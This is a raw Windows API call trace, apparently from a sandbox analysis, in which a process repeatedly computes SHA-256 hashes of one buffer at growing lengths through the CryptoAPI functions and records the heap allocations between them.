	[0253.133] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4db0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4db0, pdwDataLen=0x128c3c) returned 1
	[0253.133] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.133] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.133] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.133] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.133] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0253.133] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4dd8
	[0253.133] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4dd8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4dd8, pdwDataLen=0x128c3c) returned 1
	[0253.134] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.134] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.134] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.134] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.134] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0253.134] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4e00
	[0253.134] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4e00, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4e00, pdwDataLen=0x128c3c) returned 1
	[0253.134] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.134] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.134] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.135] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.135] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0253.135] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4e28
	[0253.135] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4e28, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4e28, pdwDataLen=0x128c3c) returned 1
	[0253.135] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.135] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.135] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.136] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.136] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0253.136] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4e50
	[0253.136] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4e50, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4e50, pdwDataLen=0x128c3c) returned 1
	[0253.136] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.136] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.136] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.136] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.136] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0253.136] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4e78
	[0253.136] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4e78, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4e78, pdwDataLen=0x128c3c) returned 1
	[0253.136] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.137] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.137] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.137] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.137] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0253.137] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4ea0
	[0253.137] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4ea0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4ea0, pdwDataLen=0x128c3c) returned 1
	[0253.137] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.137] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.137] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.138] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.138] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0253.138] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4ec8
	[0253.138] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4ec8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4ec8, pdwDataLen=0x128c3c) returned 1
	[0253.138] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.138] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.138] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.139] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.139] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0253.139] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4ef0
	[0253.139] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4ef0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4ef0, pdwDataLen=0x128c3c) returned 1
	[0253.139] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.139] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.139] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.139] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.140] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0253.140] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4f18
	[0253.140] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4f18, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4f18, pdwDataLen=0x128c3c) returned 1
	[0253.140] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.140] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.140] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.140] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.140] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0253.140] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4f40
	[0253.140] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4f40, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4f40, pdwDataLen=0x128c3c) returned 1
	[0253.140] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.140] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.140] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.141] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.141] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0253.141] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4f68
	[0253.141] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4f68, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4f68, pdwDataLen=0x128c3c) returned 1
	[0253.141] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.141] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.141] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.142] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.142] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0253.142] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4f90
	[0253.142] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4f90, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4f90, pdwDataLen=0x128c3c) returned 1
	[0253.142] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.142] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.142] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.143] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.143] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0253.143] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4fb8
	[0253.143] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c4fb8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4fb8, pdwDataLen=0x128c3c) returned 1
	[0253.143] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.143] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.143] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.143] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.143] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0253.143] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4fe0
	[0253.143] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c4fe0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c4fe0, pdwDataLen=0x128c3c) returned 1
	[0253.143] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.143] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.143] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.144] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.144] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0253.144] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5008
	[0253.144] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5008, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5008, pdwDataLen=0x128c3c) returned 1
	[0253.144] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.144] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.144] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.144] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.144] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0253.144] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5030
	[0253.144] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5030, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5030, pdwDataLen=0x128c3c) returned 1
	[0253.144] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.144] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.144] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.145] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.145] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0253.145] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5058
	[0253.145] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5058, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5058, pdwDataLen=0x128c3c) returned 1
	[0253.145] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.145] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.145] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.145] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.145] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0253.145] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5080
	[0253.146] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5080, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5080, pdwDataLen=0x128c3c) returned 1
	[0253.146] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.146] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.146] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.146] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.146] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0253.146] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c50a8
	[0253.146] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c50a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c50a8, pdwDataLen=0x128c3c) returned 1
	[0253.146] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.146] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.146] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.146] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.146] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0253.147] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c50d0
	[0253.147] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c50d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c50d0, pdwDataLen=0x128c3c) returned 1
	[0253.147] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.147] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.147] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.147] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.147] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0253.147] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c50f8
	[0253.147] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c50f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c50f8, pdwDataLen=0x128c3c) returned 1
	[0253.147] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.147] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.147] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.147] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.147] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0253.148] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5120
	[0253.148] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5120, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5120, pdwDataLen=0x128c3c) returned 1
	[0253.148] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.148] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.148] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.148] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.148] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0253.148] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5148
	[0253.148] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5148, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5148, pdwDataLen=0x128c3c) returned 1
	[0253.148] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.148] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.148] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.148] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.149] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0253.149] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5170
	[0253.149] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5170, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5170, pdwDataLen=0x128c3c) returned 1
	[0253.149] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.149] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.149] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.149] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.149] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0253.149] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5198
